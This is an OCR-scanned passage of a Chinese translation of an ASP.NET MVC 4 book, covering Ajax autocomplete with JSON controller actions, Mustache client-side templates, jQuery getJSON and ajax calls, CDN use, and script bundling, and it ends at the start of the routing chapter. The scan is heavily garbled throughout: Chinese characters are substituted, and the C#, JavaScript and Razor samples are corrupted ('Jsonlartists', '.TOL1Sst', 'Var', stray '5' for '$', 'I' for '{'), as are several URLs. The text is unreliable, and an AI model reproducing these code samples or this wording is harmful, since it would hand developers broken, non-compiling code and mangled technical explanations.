data-autocomplete-source="@Ur]l1 .Action("QuickSsSearch", "Home™")™ /> 


目 动 完 成 部 件 调用 数据 源 , 返 回 它 可 以 用 来 为 用 户 构建 列表 的 对 象 集 , 而 HomeController 
控制 器 中 的 QuickSearch 操作 需要 以 目 动 完 成 部 件 能 够 理解 的 格式 返回 数据 。 
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2. 构建 数据 源 


自动 完成 部 件 调 用 数据 源 ， 接 收 JSON 格式 的 对 象 。 辛 亏 ASPNET MVC 控制 器 操作 
可 以 很 容易 地 生成 JSON 格式 的 数据 ， 这 些 内 容 后 面 会 进行 介绍 。 接 收 的 对 象 必 须 包含 一 
个 名 为 label 的 属性 ， 或 包含 一 个 名 为 value 的 属性 ， 或 者 二 者 此 有 。 目 动 完成 部 件 在 给 用 
户 展示 的 文本 中 使 用 的 是 label 属性 。 当 用 户 从 自动 完成 列表 中 选择 一 个 项 时 ,自动 完成 部 
件 会 将 选择 项 的 值 放 入 相关 的 输入 元 素 中 。 如 果 我 们 既 不 提供 label 属性 ， 也 不 提供 value 
属性 ， 目 动 完 成 部 件 就 会 使 用 任意 可 用 属性 作为 值 和 标签 。 

为 返回 合适 的 JSON 数据 ， 我 们 需要 按照 下 面 的 代码 实现 QuickSearch 操作 : 

public ActionResult QuickSearch (string term) 

{ 

Var artists = GetArtists (term) .Select (a => new {value = a.Namel}),; 
return Jsonlartists, JsonRequestBehavior.AllowGet)}); 

} 

private List<Artist> GetArtists (string searchSstring) 

{ 

return storeDB.Artists 
.Wherel(a => a.Name.Contains (searchstring)) 
.TOL1Sst(}; 

} 

当 目 动 完 成 部 件 调用 数据 源 时 , 我 们 就 把 输入 元 素 的 当前 值 作为 名 为 term 的 查询 字符 
串 参 数 传递 , 因此 , 在 控制 器 的 操作 中 我 们 可 以 通过 一 个 名 为 term 的 参数 来 接收 这 个 参数 。 
注意 ， 上 面 的 代码 是 如 何 使 用 value 属性 把 每 一 个 艺术 家 转换 成 一 个 匿名 类 型 的 对 象 呢 ? 
原来 它 是 把 结果 集 传 递 给 了 可 以 生成 JsonResult 的 Json 方法 。 当 框架 执行 这 个 返回 结果 时 ， 
它 就 会 把 对 象 序 列 化 为 JSON 格式 的 数据 。 

运行 效果 如 图 8-4 所 示 。 

Black Label Society 


Black Sabbath 


The Black Crowes 》 
es ee | 
he Boct CW For Thos Let Then 


Ve Ue oy 


JSON 动 持 

默认 情况 下 ，ASPNET MVC 框架 不 允许 使 用 JSON 负载 啊 应 HTTP GET 请 求 。 如 果 为 
了 啊 应 GET 请 求 , 需要 发 送 JSON 格式 的 数据 ,就 需要 使 用 JsonRequestBehavior.AllowGet 
作为 Json 方法 的 第 二 个 参数 就 是 用 来 显 式 地 文 持 这 一 操作 。 

然而 ， 这 样 就 给 了 恶意 用 户 可 乘 之 机 ， 他 们 可 以 通过 有 名 的 JSON 支持 进程 来 获得 对 
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JSON 负载 的 访问 权 。 因 此 ， 我 们 不 能 在 GET 请 求 中 使 用 JSON 格式 返回 敏感 信息 。 更 多 
的 相关 信息 ， 请 参看 Phil 的 帖子 ， 网 址 是 http://haacked.com/archive/2009/06/25/json- 
hllackmsg.aspX。 


JSON 不 仅 在 控制 器 操作 中 容易 创建 ， 而 且 它 还 是 轻 量 级 的 。 事 实 上 ， 在 数据 量 相 同 
的 情况 下 ， 用 JSON 响应 请 求 通 常 比 将 数据 对 入 HTML 或 XML 标记 中 产生 更 小 负载 。 搜 
索 功 能 便 是 一 个 很 好 的 证 明 。 目 前 ， 当 用 户 单 击 search 按钮 时 ， 最 终 会 在 HTML 中 演 染 一 
个 艺术 家 的 部 分 视图 。 如 果 返 回 JSON 格式 的 数据 ， 那 么 可 以 减 小 使 用 的 市 客 量 。 


四 为 在 自己 的 MVC Music Store 项 目 中 运行 自动 完成 的 例子 ， 使 用 NuGet 
安 朋 Wrox.ProMvc4.Ajax.Autocomplete 包 , 然后 运行 程序 , 姓 航 到 /Autocomplete 
页 面 。 


从 服务 器 检索 JSON 的 经 典 问题 是 对 反 序列 化 对 象 的 处 理 。 我 们 可 以 很 容易 地 从 服务 
器 上 获取 HTML 标记 ， 并 把 它 移植 到 相应 页 面 中 。 使 用 原始 数据 需要 在 客户 端 上 构建 
HTML。 传 统 上 ， 这 个 工作 是 兄长 乏味 的 ， 但 模板 使 它 变 得 极其 容易 。 


8.4.3 JSON 和 客户 站 模 板 


从 今 以 后 ， 有 许多 JavaScript 模板 库 可 供 我 们 选择 使 用 。 由 寺 每 个 库 在 风格 和 语法 上 
部 略 有 不 同 ， 因 此 ， 我 们 只 需要 选择 使 用 符合 上 自己 口味 的 库 。 所 有 的 模板 库 提供 的 功能 上 
Razor 类 似 。 从 革 种 意义 上 说 ， 我 们 有 HIML 标记 ， 以 及 在 数据 出 现 的 地 方 带 有 特殊 分 隔 
得 的 占 位 答 。 这 些 占 位 竺 通常 被 称 为 绑 定 表达 式 。 下 和 耐 代码 是 一 个 使 用 Mustache 的 示例 ， 

草 后 面 还 会 用 到 模板 库 Mustache: 
<span class="detail"> 
Rating: {{AverageReview}} 
Total Reviews: {{TotalReviews}} 

</span> 

上 面 的 模板 处 理 了 带 有 AverageReview 和 TotalReviews 属性 的 对 象 。 当 演 染 带 有 
Mustache 的 模板 时 ,模板 会 把 那些 属性 值 放 在 合适 的 位 置 。 我 们 也 可 以 泻 染 处 理 数 据 数组 的 
模板 。 更 多 关于 Mustache 模板 的 文档 可 在 网 上 获取 , 网 址 为 https://github.conyjanl/mustache.js。 

接 下 来 编写 使 用 JSON 和 模板 的 搜索 特性 。 


1. 添加 模板 


为 了 安装 jQuery 模板 , 右 击 MvcMusicStore 项 目 , 选 择 Manage NuGet Package 菜单 项 。 
当 对 话 框 出 现时 (如 图 8-5 所 示 )， 就 可 以 在 线 搜索 “mustache.js”。 
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图 8-5 


当 使 用 NuGet 完成 同 项 目 添加 包 之 后 ， 在 Scripts 文件 夹 中 会 出 现 一 个 名 为 tache.js 
狐 文 件 。 为 了 开始 编写 模板 ， 可 在 布局 视图 中 漆 加 一 个 Mustache 的 脚本 引用 : 


<SCript src="~/Scripts/jquery-1.6.2.min.]s" 
></script> 
<ScCript src="~/Scripts/jquery.unobtrusive-ajax.min.]s" 
></script> 
<script src="~/Scripts/jquery—ui.min.js" 
></script> 
<script src="~/Scripts/mustache.Jjs" 
></script> 


添加 完 插 件 后 ， 就 可 以 在 搜索 实现 中 使 用 模板 。 
2. 修改 搜索 表单 
在 本 章 前 面 第 8.2.3 蔬 中 ， 创 建 乞 术 家 搜索 功能 时 用 到 了 一 个 Ajax 辅助 方法 : 


Qusing (Ajax.BeginForm("ArtistSearch", "Home™", 
new AjaxOptions I 
InsertionMode=InsertionMode.Replace, 
HttpMethod="GET", 
OnFalilure="searchFailed"™, 
LoadingElementId="ajJax-loader™, 
UpdateTarget1Id="searchresults", 

})) 
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<input type="text” name="g" 
data-autocomplete-source="@Url1.Action("QuickSsSearch", "Home™")™ /> 
<input type="submit" value="search™ /> 
<img id="ajax—-loader"™ 
Src="~/Content/Images/ajax—-loader.gif" 
style="display:none"/> 


} 


尽管 Ajax 辅助 方法 提供 了 大 量 功能 ， 但 我 们 要 删除 这 些 辅助 方法 ， 从 头 开始 。jQuery 
提供 了 用 来 从 服务 器 异步 检索 数据 的 各 种 API。 我 们 前 面 通过 使 用 上 自动 完成 部 件 ， 己 经 间 
接地 利用 了 这 些 特性 ， 下 面 我 们 将 直接 利用 这 些 方法 特性 。 
首先 ， 修 改 搜索 表单 ， 使 其 直接 使 用 jQuery 而 不 使 用 Ajax 辅助 方法 ， 当 然 使 用 现 有 
的 控制 需 代 码 (没有 JSON) 也 可 以 正常 运 转 。 修 改 后 ，Index.cshtml 视图 内 部 的 新 标记 如 下 
所 示 : 
<form id="artistSearch" method="get™" action="Q@Ur]l1.Action("ArtistSsearch", 
"Home™") >> 
<input 七 YPe= 七 eXt ”name= 可 
data-autocomplete-source="@Ur]l1 .Action("QuickSearch"”，"Home") ”/> 
<input type="submit" value="search™ /> 
<img id="ajax—-loader™" src="~/Content/Images/ajax—-loader.gif" 
style="display:none"/> 
</form> 


显而易见 ， 上 面 代 人 码 只 改变 了 构建 form 标签 的 方式 ，action 特性 使 用 的 不 再 是 Ajax 
辅助 方法 BeginForm。 如 果 不 使 用 这 个 辅助 方法 , 我 们 就 不 得 不 自己 编写 JavaScript 代码 来 
向 服务 器 请 求 HTML。 可 以 把 下 面 的 代码 放 入 MusicScripts.js 文件 内 部 : 


$ ("#artistSearch") .submit (function (event) I 
event .preventDefault () ， 


Var form = $ (this); 
5 ("#searchresults") .load (form.attr("action"), form.serialize()); 


}); 


这 段 代 码 关 联 了 表单 的 submit 事件 。 在 传 入 的 事件 参数 中 ， 调 用 preventDefault 时 ， 
上 面 代码 用 到 了 可 以 阻止 触发 默认 事件 的 jQuery 技术 。 在 这 个 示例 中 ,jQuery 技术 是 用 来 
阻止 表单 直接 提交 到 服务 器 ;这 样 一 来 ， 我 们 就 可 以 控制 请 求 和 啊 应 了 。 

load 方法 从 URL 中 检索 HTML， 并 把 检索 出 的 HTML 放 入 匹配 的 元 素 (searchresults 
元 素 ) 中 。 该 方法 的 第 一 个 参数 是 URL 一 一 正在 使 用 的 action 特性 值 。 第 二 个 参数 是 传 入 查 
询 字 符 串 的 数据 。jQuery 的 serialize 方法 通过 将 表单 内 部 的 所 有 输入 值 连接 成 一 个 字符 串 
来 构建 数据 。 在 这 个 例子 中 , 只 有 单个 文本 输入 元 素 , 如 果 用 户 在 其 中 输入 “black”, serialize 
方法 就 会 使 用 输入 元 素 的 名 称 和 值 来 构建 字符 串 “q=black”。 
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3. 获取 JSON 


我 们 已 经 修改 了 代码 ， 但 服务 器 仍 返 回 HTML。 下 面 继续 修改 HomeController 控制 器 
的 ArtistSearch 操作 ， 使 其 能 够 返回 JSON， 而 不 是 返回 部 分 视图 : 


public ActionResult ArtistSearch (string q) 
{ 


Var artists = GetArtists (gq); 
return Jsonl(lartists, JsonRequestBehavior.AllowGet)., 
} 
现在 需要 修改 脚本 代码 来 返回 JSON 而 不 是 HITML。jQuery 提供 了 一 个 称 为 getJSON 
的 方法 ， 它 可 用 来 检索 数据 : 
$s ("#artistSearch") .submit (function (event) I 
event .preventDefault (}); 


Var form = $ (this); 

$ .getJsSON (form.attr ("action"), form.serialize(), function (data) 
// now what? 

}); 

}); 

上 面 的 代码 没有 对 先前 的 版 本 进行 太 多 修改 ， 代 码 由 调用 load 方法 改 为 调用 geUSON 
方法 。GetJSON 方法 不 执行 匹配 集 ， 但 和 它 可 以 利用 一 个 给 定 的 URL 和 一 些 碍 询 字 符 串 数 
据 ， 发 出 一 个 HTTP GET 请 求 ， 将 JSON 响应 反 序 列 化 为 一 个 对 象 ， 然 后 调用 作为 第 三 个 
参数 传 入 的 回调 方法 。 那 么 在 回调 方法 内 部 如 何 处 理 呢 ? 现在 有 了 JSON 格式 的 数据 一 一 

-组 艺术 家 一 一 但 没有 显示 艺术 家 的 标记 。 现在 模板 开始 发 挥 作用 了 。 模板 就 是 艇 入 script 
标签 内 的 标记 。 下 面 的 代码 展示 了 一 个 模板 ， 以 及 search 操作 应 该 显示 的 搜索 结果 标记 : 
<script id="artistTemplate™ type="text/html"> 
<ul> 
{{#artists}} 
<1i>{{Name}}</1i> 
{{/artists}} 
</ul> 
</script> 
< 中 LIV lid="searchresults"> 


</div> 


注意 上 面 text/html 类 型 的 脚本 标签 ， 它 确保 了 浏览 器 不 会 将 脚本 标签 的 内 容 作 为 真实 
代码 进行 解释 。{{#artists}} 表 达 式 告知 模板 引 敬 在 数据 对 象 上 循环 碗 代 一 个 名 为 artists 的 
数组 ， 这 个 数组 要 用 来 泻 染 模板 。{{Name}} 语 法 是 一 个 绑 定 表达 式 ， 它 告知 模板 引擎 查找 
当前 数据 对 象 的 Name 属性 ， 并 把 找到 的 值 放 在 <l> 和 </1i> 之 间 。 结 果 就 会 生成 JSON 数据 
的 无 序列 表 。 
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要 使 用 该 模板 ， 我 们 需要 在 geUSON 方法 的 回调 方法 内 部 选择 它 ， 并 告知 Mustache 
把 模板 演 染 成 HTML: 


5 ("#artistSearch") .submit (function(event) { 
event .preventDefault (); 


Var form = $ (this); 
$ .getJSON (form.attr ("action"), form.serialize(), function(data) { 
Var html = Mustache .to html (3 ("#artistTemplate") .html(), { artists: 
data 1}); 
5s("#searchresults") .empty() .append (html); 
}); 
}); 


Maustache 的 to_html 方法 结合 模板 和 JSON 数据 来 生成 标记 。 上 面 的 代码 获取 模板 输 
出 ， 并 把 输出 放 在 查询 结果 元 素 中 。 

在 客户 端 ， 模 板 是 一 项 功能 强大 的 技术 ， 本 节 只 是 触及 了 模板 引擎 特性 的 表层 。 然 而 ， 
这 是 不 能 与 本 章 前 面 的 Ajax 辅助 方法 的 功能 相提并论 的 。 从 本 章 前 面 的 8.2 节 可 知 ，Ajax 
辅助 方法 可 以 在 服务 器 抛 出 错误 时 调用 方法 ， 也 可 以 在 请 求 得 不 到 响应 时 ， 打 开 gif 动画 。 
我 们 也 可 以 实现 所 有 这 些 特性 ， 只 不 过 需要 删除 一 级 抽象 。 


4. 使 用 jQuery.ajax 获得 最 大 灵活 性 


当 要 实现 对 Ajax 请 求 的 完全 控制 时 ， 我 们 可 以 使 用 jQuery.ajax 方法 。ajax 方法 采用 一 
个 选项 参数 ， 可 以 用 来 指定 HTTP 动词 (如 GET 或 POST)、 超 时 、 错 误 处 理 程序 等 。 已 经 
看 到 的 所 有 其 他 异步 通信 方法 (load 和 geUSON) 最 终 都 调用 了 ajax 方法 。 

使 用 ajax 方法 ， 可 获得 Ajax 辅助 方法 所 提供 的 所 有 功能 ， 并 且 仍 然 可 以 使 用 客户 端 
模板 : 


$s ("#artistSearch") .submit (function (event) I 
event .preventDefault (); 


var form = $ (this); 
5.ajax(t 
url: form.attr("action”™), 
data: form.serializel(), 
beforeSend: function () { 
$ ("#ajax—-loader™.) .Show() ; 
}, 
complete: function () { 
$ ("#ajax—-loader™") .hide ()，; 
}, 
error: SearchFailed, 
success: function (data) 1 
Var html = Mustache.to html ($("#artistTemplate") .htm]l () ， 
{ artists: data }); 
$ ("#searchresults") .empty() .append (html) ; 
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}); 

}); 

调用 ajax 方法 是 非常 繁 项 的 ， 因 为 我 们 需要 目 定 义 很 多 设置 。ajax 方法 选项 中 的 url 
和 data 属性 就 像 是 传递 给 load 和 getJSON 方法 的 参数 。ajax 方法 给 了 我 们 为 beforeSend 
和 complete 提供 回调 函数 的 能 力 。 我 们 可 在 回调 期 间 分 别 显示 和 隐藏 gf 动画 ， 以 告知 用 
户 ， 请 求 未 能 得 到 啊 应 。jQuery 将 调用 complete 回调 函数 ， 即 便 调 用 服务 器 会 导致 失败 。 
然而 , 男 两 个 回调 方法 一 一 error 和 success 一 一 中 只 能 有 一 个 可 以 调用 成 功 。 如 果 调 用 失败 ， 
jQuery 就 会 调用 在 第 8.2.3 节 中 已 经 定义 好 的 searchFailed 错误 函数 。 如 果 此 时 调用 成 功 ， 


注意 ”如果 想 在 自己 的 MVC Music Store 项 目 中 党 试 这 些 代 码 ， 请 使 用 
NuGet 安装 Wrox.ProMvc4.Ajax.Templates 包 ， 安 装 成 功 后 ， 运 行程 序 ， 手 航 
到 /Templates 查看 完善 后 的 首页 。 


8.5 ”提高 Ajax 性 能 


当 问 客户 端 发 送 大 量 的 脚本 代码 时 ， 就 需要 考虑 性 能 问题 。 可 以 使 用 很 多 工具 来 优化 
网 站 的 客户 端 性 能 ， 其 中 包括 Firebug 的 YSlow( 参 见 http:Wdeveloperyahoo.comy/yslow/ 和 
IE 的 开发 者 工具 (参见 http://msdn.microsoft.com/en-us/library/dd565629(VS.85).aspx)。 本 节 
提供 了 一 些 提高 性 能 的 技巧 。 


8.5.1 使 用 内 容 分 发 网 络 


尽管 通过 使 用 目 己 服务 器 上 的 jQuery 脚本 可 使 jQuery 正常 工作 ， 但 是 也 可 能 考虑 问 
引用 了 内 容 分 发 网 络 (Content Delivery NetwoIk, CDN) 的 jQuery 客户 端 发 送 一 个 脚本 标签 。 
CDN 在 世界 各 地 都 有 边缘 绥 存 (edge-cacheqd) 服 务 占 ， 因 此 客户 端 很 有 可 能 体验 到 更 快 的 下 
载 。 因 为 其 他 站 点 也 引用 来 自 CDN 的 jQuery， 所 以 客户 端 可 能 已 经 有 文件 缓存 在 本 地 。 
另外 ， 如 条 有 人 能 为 您 省 下 载 脚本 的 市 宽 开 销 ， 总 是 很 好 的 。 

Microsoft 是 一 个 我 们 可 以 使 用 的 CDN 提供 商 。Microsoft 的 CDN 拥有 本 章 用 到 的 所 
有 文件 。 如 果 想 使 用 来 目 Microsoft CDN 的 jQuery 而 不 使 用 目 己 的 服务 器 的 jQuery， 可 使 
用 下 面 的 脚本 标签 : 

<SCript src="http://a]jax.aspnetcadn.comy ajax/]CueryY/]dquery-1.6.2.min.]jsn" 

type="text/javascript"></script> 

要 想 查 看 URL 列表 和 Microsoft CDN 的 所 有 最 新 版 本 , 请 登录 网 址 http://www.asp.net/ 
ajaxlibrary/CDN .ashx.。 
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8.5.2 脚本 优化 


许多 Web 开发 人 员 没 有 在 文档 的 head 元 素 中 使 用 scrip 标签 。 相 反 ， 他 们 将 script 标 
等 尽 可 能 地 放置 在 页 面 的 压 部 。 这 样 做 是 因为 ， 如 果 把 script 标签 放 在 页 面 项 部 的 <head> 
标签 中 ， 当 浏览 器 迪 到 script 标签 时 ， 它 就 会 阻止 其 他 内 容 的 下 载 ， 直 到 它 检索 完整 个 脚 
本 ， 这 样 会 减 慢 页 面 加 载 的 速度 。 因 此 ， 所 有 script 标签 都 放 在 页 面 底部 ( 仅 位 于 body 绪 
束 标签 之 前 ) 束 会 产生 很 好 的 用 户 体验 。 

另 一 种 优化 脚本 的 技术 是 减少 问 客 户 站 发 送 的 script 标签 数量 。 我 们 不 得 不 权衡 最 小 
化 脚本 引用 和 缓冲 单独 的 脚本 的 性 能 增益 ， 庆 和 幸 的 是 ， 前 面 提 到 的 工具 ( 像 YSlow) 可 以 帮 
助 我 们 做 出 正确 的 决定 。ASPNET MVC 4 有 能 力 绑 定 脚本 ， 所 以 我 们 可 为 客户 问 把 多 个 脚 
本 文件 绑 定 成 一 个 脚本 文件 来 减少 下 载 的 数据 量 。 MVC 4 也 可 降低 传输 中 的 脚本 量 进而 减 
少 下 载 的 数据 量 。 


8.5.3 ”捆绑 和 和 做 小 


捆绑 (bundling) 和 微小 (minification) 功 能 由 名 称 空间 System.Web.Optimization 中 的 类 提 
供 。 顾名思义 ， 这些 类 是 用 来 优化 Web 页 面 性 能 的 ,它们 通过 缩减 文件 大 小 ， 捆 绑 文件 (把 
多 个 文件 合并 成 一 个 下 载 文件 ) 来 实现 优化 ,捆绑 和 微小 的 结合 可 以 缩短 浏览 器 加 载 页 面 的 
时 间 。 

当 创 建 ASPNET MVC 4 应 用 程序 时 ， 捆 绑 会 在 程序 启动 时 上 自动 配置 。 配 置 好 的 捆绑 
文件 存储 在 新 项 目的 App_Start 文件 夹 中 ， 其 名 称 是 BundleConfig.cs。 在 程序 中 ， 我 们 会 
发 现 像 下 面 这 样 配置 脚本 捆绑 (JavaScripb 和 样式 捆绑 (CSS) 的 代码 ; 


bundles.Add (new ScriptBundle("~/bundles/jquery") .Include ( 
"~/Scripts/jquery—1.*")); 


bundles.Add (new StyleBundle ("~/Content/css") .Include("~/Content/site.css"));} 


bundles.Add (new ScriptBundle("~/bundles/jqueryui") .Includel 
"~/Scripts/jquery-—ui*")); 


脚本 捆绑 组 合 了 虚拟 路 径 ( 像 ScriptBundle 构造 函数 的 第 一 个 参数 ~/bundles/jquery) 和 人 包 
合 在 捆绑 中 的 文件 列表 。 虚 拟 路 径 是 后 面 我 们 在 视图 中 输出 捆绑 时 使 用 的 标识 。 捆 绑 中 的 
文件 列表 可 以 通过 一 次 或 多 次 调用 Include 方法 来 指定 ， 在 Include 方法 的 调用 中 ， 我 们 可 
指定 一 个 具体 的 文件 名 称 ,或 者 指定 一 个 之 有 通配符 的 文件 名 称 来 一 次 表示 多 个 文件 名 称 。 

在 上 向 代码 中 , 文件 说 明 符 “~/Scripts/jquery-ui* ”告诉 运 行 时 在 捆绑 中 包含 所 有 jQuery 
UI 脚本 (即便 只 有 一 个 脚本 文件 )。 运 行 时 非常 智能 ， 它 能 根据 标准 JavaScript 命名 约定 区 
分 JavaScript 库 是 精简 版 本 还 是 非 精 向 版 本 。 说 明 符 在 捆绑 中 包含 了 jquery-ui-1.18.11.js， 
但 未 包含 jquery-ui-1.18.11.min.js。 可 在 BundleConfig.cs 中 创建 和 修改 目 己 的 捆绑 。 

- 旦 捆绑 配置 ， 我 们 就 能 够 使 用 Scripts 和 Styles 辅助 类 演 染 拥 绑 。 下 面 的 代码 就 会 输 

出 jQuery 捆绑 和 默认 的 应 用 程序 样式 表 : 
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QScripts.Render ("~/bundles/jquery") 
QSsStyles.Render ("~/Content/css") 


传递 给 Render 方法 的 参数 是 用 来 创建 捆绑 的 虚拟 路 径 。 当 应 用 程序 运行 在 debug 模式 
时 (特别 在 web.config 的 compilation 六 中 把 debug 标签 设置 为 tue)， 脚 本 和 样式 辅助 方法 
就 会 为 捆绑 中 的 每 个 文件 泻 染 一 个 script 标签 。 当 应 用 程序 运行 在 release 模式 时 ， 辅 助 方 
法 会 把 捆绑 中 的 所 有 文件 合并 成 一 个 下 载 文件 ， 然 后 在 输出 中 放置 一 个 链接 或 script 元 素 。 
在 release 模式 中 ， 辅 助 方 法 默认 也 精简 文件 减 小 下 载 的 数据 量 。 


8.6 ”小结 


章 对 ASPNET MVC 4 中 的 Ajax 特性 进行 了 快速 扼要 的 介绍 。 学 习 完 本 章 ， 应 该 知 
道 这 些 特 性 主要 依赖 于 开源 jQuery 库 和 一 些 流行 的 jQuery 插件 。 

成 功 学 习 ASPNET MVC 4 中 的 Ajax 特性 的 关键 是 理解 jQuery， 并 在 项 目 中 使 用 
jQuery。 jQuery 不 仅 灵 活 强 大 ,还 可 以 使 脚本 代码 与 标记 分 离 ， 以 及 编写 非 侵入 式 JavaScript 
代码 。 这 就 意味 着 我 们 可 以 集中 精力 编写 更 好 的 JavaScript 代码 ， 并 拥有 jQuery 提供 的 所 
有 功能 。 

章 还 介绍 了 客户 端 模板 的 用 法 以 及 控制 器 操作 中 的 JSON 服务 。 尽 管 可 以 很 容易 地 
从 控制 器 操作 生成 JSON, 但 是 我 们 也 可 以 用 Web API 生成 JSON。 当 构 建生 成 数据 的 Web 
服务 时 ，Web API 还 包括 其 他 一 些 功 能 和 灵活 性 。 关 于 Web API 的 内 容 ， 我 们 会 在 第 11 
章 进 行 详细 介绍 。 
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本 章 主要 内 容 

e 理解 URL 

e 路 由 概述 

e 浅 谈 路 由 的 底层 实现 

e 高 级 路 由 

e 路 由 的 扩展 性 

e 如何 同时 使 用 Web Forms 和 路 由 


软件 开发 人 员 和 负 着 对 一 些小 的 细节 问题 倍加 关注 ， 尤 其 在 考虑 源 代 码 的 质量 和 结构 时 
更 是 如 此 。 我 们 常常 为 代码 缩 排 的 风格 以 及 花 插 号 的 范围 而 争论 不 休 。 笔 者 看 来 ， 这 些 斗 
争 合演 愈 烈 。 

因此 ， 当 过 到 大 部 分 使 用 ASPNET 技术 构建 的 站 点 ， 使 用 如 下 所 示 的 URL 地 址 时 ， 


可 能 会 有 些 奇怪 : 
http://example.com/albums/l1ist.aspx?catid=]1731l3&genreid=337123&page=3 


我 们 既然 对 代码 倍加 重视 ， 为 什么 不 能 同样 地 重视 URL 呢 ? 虽然 URL 看 上 去 并 不 是 
那么 重要 ， 但 它 却 是 一 种 合法 的 且 广 泛 使 用 的 Web 用 户 接口 。 

本 章 主要 介绍 如 何 将 逻辑 URL 映射 到 控制 器 上 的 操作 方法 。 此 外 ， 本 章 还 会 介绍 
ASPNET 路 由 特性 ， 这 是 一 个 单独 API，ASPNET MVC 框架 通过 它 的 调用 可 以 把 URL 映 
射 到 方法 的 调用 。 本 章 首先 介绍 ASPNET MVC 框架 如 何 使 用 路 由 ， 然 后 再 简单 介绍 作为 
单独 特性 的 路 由 的 底层 工作 原理 。 
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9.1 统一 资源 定位 符 一 一 URL 


可 用 性 专家 Jakob Nielsen(wwwuseitcom) 力 劝 开 发 人 员 重 视 URL(Uniform Resource 

Locator)， 并 指出 高 质量 的 URL 应 该 满足 以 下 几 点 要 求 : 

e 域名 便于 记忆 和 拼写 

e 何 短 

e 便于 答 入 

e 可 以 反映 出 站 点 结构 

e 应 该 是 “可 人 破解 的 ”， 用 户 可 以 通过 移 除 

体系 结构 

e 持久 、 不 能 改变 

按照 传统 ， 在 很 多 Web 框架 中 (如 经 典 的 ASP、JSP、PHP、ASPNET 等 之 类 的 框架 )， 
URL 代表 的 是 磁盘 上 的 物理 文件 。 例如 , 当 看 到 请 求 一 一 http://example.com/albums/list.aspx 
时 , 我 们 可 以 确定 该 站 点 的 目录 结构 中 含有 一 个 albums 文件 夹 ， 并 且 在 该 文件 夹 下 还 有 一 
个 List.aspx 文件 

在 上 述 示 例 中 ，URL 和 磁盘 上 物理 存在 的 内 容 存 在 直接 的 对 应 关系 。 当 Web 服务 需 
接收 到 该 URL 的 请 求 时 ， 为 了 啊 应 客户 端 请 求 ， 它 就 会 执行 一 些 与 该 文件 相关 联 的 代码 。 

URL 和 文件 系统 之 间 这 种 一 一 对 应 的 关系 并 不 适用 于 大 部 分 基于 MVC 的 Web 框架 ， 
如 ASPNET MVC。 一般 来 说 , 这 些 框架 应 用 不 同 的 方法 把 URL 映射 到 茶 个 类 的 方法 调用 ， 
而 不 是 映射 到 磁盘 上 的 某 个 物理 文件 。 

正如 在 第 2 章 中 看 到 的 ， 这 些 映射 到 的 类 通 第 称 作 控 制 器 ， 之 所 以 这 样 称 呼 ， 是 因为 
它们 主要 用 来 控制 用 户 输入 和 系统 组 件 之 间 的 交互 。 用 来 响应 用 户 请 求 的 方法 通常 称 作 操 
作 ， 它 们 代表 了 控制 费 为 啊 应 用 户 输入 请 求 而 处 理 的 各 种 操作 。 

有 人 可 能 会 认为 URL 是 访问 文件 的 一 种 方法 , 对 于 习惯 了 这 些 想 法 的 人 来 说 , 把 URL 
英 射 为 类 的 方法 调用 可 能 会 让 他 们 感到 很 不 目 然 ， 他 们 认为 URL 融 是 统一 资源 定位 符 
(Uniform Resource LocatonD) 的 首 字 母 缩写 。 这 种 情况 下 ， 资 源 是 一 个 抽象 概念 ， 既 可 以 指 一 
个 文件 ， 也 可 以 指 方法 调用 的 结果 或 服务 器 上 的 一 些 其 他 内 容 。 

通常 情况 下 ，URI 代表 统一 资源 标识 符 (Uniform Resource Identifier，URD。 从 技术 角 
度 看 ， 所 有 URL 都 是 URI。W3C 认为 “URL 是 一 个 非 正式 的 概念 ， 但 它 非常 有 用 : URL 
是 URI 的 一 种 类 型 ， 它 通过 表示 目 身 的 主要 访问 机 制 来 标识 资源 ”( 引 目 http://www.w3.org/ 
TRAuri-clarification/#contemporary) 。 而 Ryan McDonough 提出 了 另 一 种 看 法 
(www.damnhandycom):“URI 是 某 种 资源 的 标识 待 ， 而 URL 则 为 获取 该 资源 提供 了 具体 
的 信息 ”。 

所 有 这 些 争 议 都 只 是 语义 上 的 , 不 管 使 用 什么 名 称 ， 大 部 分 人 都 领会 它 的 意义 。 然 而 ， 
上 面 的 讨论 对 我 们 学 习 MVC 很 有 帮助 ， 因 为 它 提 醒 我 们 URL 未 必 是 指 Web 服务 器 便 稀 
中 的 静态 资源 文件 ， 对 于 ASPNET MVC 而 言 ， 大 多 数 情 况 都 并 非 如 此 。 鉴 于 以 上 所 述 ， 


URL 的 末尾 ， 进 而 到 达 更 高 层次 的 信息 


第 9 章 路 由 
本 书 今后 一 律 使 用 传统 术语 URL。 
9.2 ”路 由 概述 


ASPNET MVC 框架 中 的 路 由 主要 有 两 种 用 途 : 
e 匹配 传 入 的 请 求 (该 请 求 不 匹配 服务 句 文 件 系 统 中 文件 )， 并 把 这 些 请 求 映 射 到 控制 
器 操作 。 
e 构造 传 出 的 URL， 用 来 啊 应 控制 器 中 的 操作 。 
以 上 两 项 内 容 只 是 描述 了 路 由 在 ASPNET MVC 应 用 程序 下 的 用 途 。 本 章 后 面部 分 会 
深入 探讨 路 由 选择 的 其 他 功能 ， 并 介绍 如 何在 ASPNET 中 使 用 这 些 功能 。 


注意 ”路 由 和 ASPNETMVC 的 关系 是 困惑 我 们 的 一 个 永恒 话题 。 在 预测 
试 阶段 ， 路 由 是 ASPNET MVC 的 一 个 集成 特性 。 然 而 ， 开 发 团队 看 到 了 它 可 
以 作为 ASPNET MVC 的 一 个 有 用 特性 ， 用 来 构建 Web 页 面 ， 因 此 ， 它 作为 
ASPNET 核心 框架 的 一 部 分 ， 被 提取 到 它 自己 的 程序 集中 。 它 的 名 称 定 为 
ASPNET 路 由 ， 但 是 大 家 喜欢 简称 它 为 路 由 。 

我 们 把 路 由 添加 到 ASPNET 中 ， 路 由 就 成 为 .NET 框架 (和 Windows) 的 一 
部 分 。 因 此 ,尽管 ASPNET MVC 经 第 更 新 版 本 ， 但 是 路 由 的 更 新 很 大 程度 上 
受制 于 NET 框架 的 更 新 ; 因此 ， 这 些 年 路 由 基本 没有 太 大 变化 。 

在 ASPNET 外 部 ，ASPNET Web API 是 可 装载 的 ， 这 样 它 就 可 以 不 需要 
直接 使 用 ASPNET 路 由 . 相反, 它 引 入 了 路 由 代码 副本 ,但 是 当 ASPNET Web 
API 托管 在 ASPNET 上 时 , 我们 就 把 所 有 Web API 路 由 映射 到 ASPNET 路 由 
的 核心 路 由 集中 。 关 于 路 由 在 ASPNET Web API 中 的 应 用 ， 第 11 章 会 进行 详 
细 介 绍 。 


9.2.1 对 比 路 由 和 URL 重 写 


